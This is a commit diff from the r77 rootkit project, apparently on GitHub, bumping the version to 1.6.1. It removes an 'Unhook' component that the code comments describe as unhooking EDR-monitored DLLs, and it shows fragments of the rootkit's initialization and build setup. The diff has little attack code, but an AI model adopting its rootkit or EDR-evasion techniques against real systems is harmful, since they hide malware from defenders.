File tree Expand file tree Collapse file tree 7 files changed +7
-23
lines changed Expand file tree Collapse file tree 7 files changed +7
-23
lines changed Original file line number Diff line number Diff line change 1
1
using System . Reflection ;
2
2
3
- [ assembly: AssemblyVersion ( "1.6.0 " ) ]
4
- [ assembly: AssemblyFileVersion ( "1.6.0 " ) ]
3
+ [ assembly: AssemblyVersion ( "1.6.1 " ) ]
4
+ [ assembly: AssemblyFileVersion ( "1.6.1 " ) ]
5
5
[ assembly: AssemblyCopyright ( "© bytecode77, 2025." ) ]
Original file line number Diff line number Diff line change @@ -82,7 +82,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki
82
82
83
83
## Downloads
84
84
85
- [ ![ ] ( https://bytecode77.com/public/fileicons/zip.png ) r77 Rootkit 1.6.0 .zip] ( https://downloads.bytecode77.com/r77Rootkit%201.6.0 .zip )
85
+ [ ![ ] ( https://bytecode77.com/public/fileicons/zip.png ) r77 Rootkit 1.6.1 .zip] ( https://downloads.bytecode77.com/r77Rootkit%201.6.1 .zip )
86
86
(** ZIP Password:** bytecode77)<br />
87
87
[ ![ ] ( https://bytecode77.com/public/fileicons/pdf.png ) Technical Documentation] ( https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf )
88
88
Original file line number Diff line number Diff line change 22
22
<CharacterSet >Unicode</CharacterSet >
23
23
</PropertyGroup >
24
24
<Import Project =" $(VCTargetsPath)\Microsoft.Cpp.props" />
25
- <ImportGroup Label =" ExtensionSettings" >
26
- <Import Project =" $(VCTargetsPath)\BuildCustomizations\masm.props" />
27
- </ImportGroup >
25
+ <ImportGroup Label =" ExtensionSettings" />
28
26
<ImportGroup Label =" Shared" >
29
27
<Import Project =" ..\r77api\r77api.vcxitems" Label =" Shared" />
30
28
<Import Project =" ..\r77\r77.vcxitems" Label =" Shared" />
31
- <Import Project =" ..\Unhook\Unhook.vcxitems" Label =" Shared" />
32
29
<Import Project =" ..\ReflectiveDllMain\ReflectiveDllMain.vcxitems" Label =" Shared" />
33
30
</ImportGroup >
34
31
<ImportGroup Label =" PropertySheets" Condition =" '$(Configuration)|$(Platform)'=='Release|x64'" >
@@ -69,7 +66,5 @@ echo F|xcopy /I /Y "$(TargetPath)" "$(SolutionDir)Stager\Resources\$(TargetName)
69
66
</PostBuildEvent >
70
67
</ItemDefinitionGroup >
71
68
<Import Project =" $(VCTargetsPath)\Microsoft.Cpp.targets" />
72
- <ImportGroup Label =" ExtensionTargets" >
73
- <Import Project =" $(VCTargetsPath)\BuildCustomizations\masm.targets" />
74
- </ImportGroup >
69
+ <ImportGroup Label =" ExtensionTargets" />
75
70
</Project >
Original file line number Diff line number Diff line change 22
22
<CharacterSet >Unicode</CharacterSet >
23
23
</PropertyGroup >
24
24
<Import Project =" $(VCTargetsPath)\Microsoft.Cpp.props" />
25
- <ImportGroup Label =" ExtensionSettings" >
26
- <Import Project =" $(VCTargetsPath)\BuildCustomizations\masm.props" />
27
- </ImportGroup >
25
+ <ImportGroup Label =" ExtensionSettings" />
28
26
<ImportGroup Label =" Shared" >
29
27
<Import Project =" ..\r77api\r77api.vcxitems" Label =" Shared" />
30
28
<Import Project =" ..\r77\r77.vcxitems" Label =" Shared" />
31
- <Import Project =" ..\Unhook\Unhook.vcxitems" Label =" Shared" />
32
29
<Import Project =" ..\ReflectiveDllMain\ReflectiveDllMain.vcxitems" Label =" Shared" />
33
30
</ImportGroup >
34
31
<ImportGroup Label =" PropertySheets" Condition =" '$(Configuration)|$(Platform)'=='Release|Win32'" >
@@ -69,7 +66,5 @@ echo F|xcopy /I /Y "$(TargetPath)" "$(SolutionDir)Stager\Resources\$(TargetName)
69
66
</PostBuildEvent >
70
67
</ItemDefinitionGroup >
71
68
<Import Project =" $(VCTargetsPath)\Microsoft.Cpp.targets" />
72
- <ImportGroup Label =" ExtensionTargets" >
73
- <Import Project =" $(VCTargetsPath)\BuildCustomizations\masm.targets" />
74
- </ImportGroup >
69
+ <ImportGroup Label =" ExtensionTargets" />
75
70
</Project >
Original file line number Diff line number Diff line change @@ -183,11 +183,9 @@ Global
183
183
r 77 api \r 77 api .vcxitems *{06af1d64-f2fc-4767-8794-7313c7bb0a40} *SharedItemsImports = 4
184
184
r 77 \r 77 .vcxitems *{06af1d64-f2fc-4767-8794-7313c7bb0a40} *SharedItemsImports = 4
185
185
ReflectiveDllMain \ReflectiveDllMain .vcxitems *{06af1d64-f2fc-4767-8794-7313c7bb0a40} *SharedItemsImports = 4
186
- Unhook \Unhook .vcxitems *{06af1d64-f2fc-4767-8794-7313c7bb0a40} *SharedItemsImports = 4
187
186
r 77 api \r 77 api .vcxitems *{1ba54a13-b390-47b3-9628-b58a2bba193b} *SharedItemsImports = 4
188
187
r 77 \r 77 .vcxitems *{1ba54a13-b390-47b3-9628-b58a2bba193b} *SharedItemsImports = 4
189
188
ReflectiveDllMain \ReflectiveDllMain .vcxitems *{1ba54a13-b390-47b3-9628-b58a2bba193b} *SharedItemsImports = 4
190
- Unhook \Unhook .vcxitems *{1ba54a13-b390-47b3-9628-b58a2bba193b} *SharedItemsImports = 4
191
189
Helper \Helper .vcxitems *{2d6fdd44-39b1-4ff8-8ae0-60a6b0979f5f} *SharedItemsImports = 4
192
190
r 77 api \r 77 api .vcxitems *{2d6fdd44-39b1-4ff8-8ae0-60a6b0979f5f} *SharedItemsImports = 4
193
191
Service \Service .vcxitems *{46e171d4-1811-48be-8867-a63c28761d28} *SharedItemsImports = 9
Original file line number Diff line number Diff line change 3
3
#include "Config.h"
4
4
#include "r77def.h"
5
5
#include "r77header.h"
6
- #include "Unhook.h"
7
6
#include <Shlwapi.h>
8
7
9
8
static BOOL RootkitInitialized ;
10
9
11
10
BOOL InitializeRootkit ()
12
11
{
13
- // Unhook DLL's that are monitored by EDR.
14
- Unhook ();
15
-
16
12
// If the process starts with $77, do not load r77.
17
13
WCHAR executablePath [MAX_PATH + 1 ];
18
14
if (FAILED (GetModuleFileNameW (NULL , executablePath , MAX_PATH ))) return FALSE;
You can’t perform that action at this time.
0 commit comments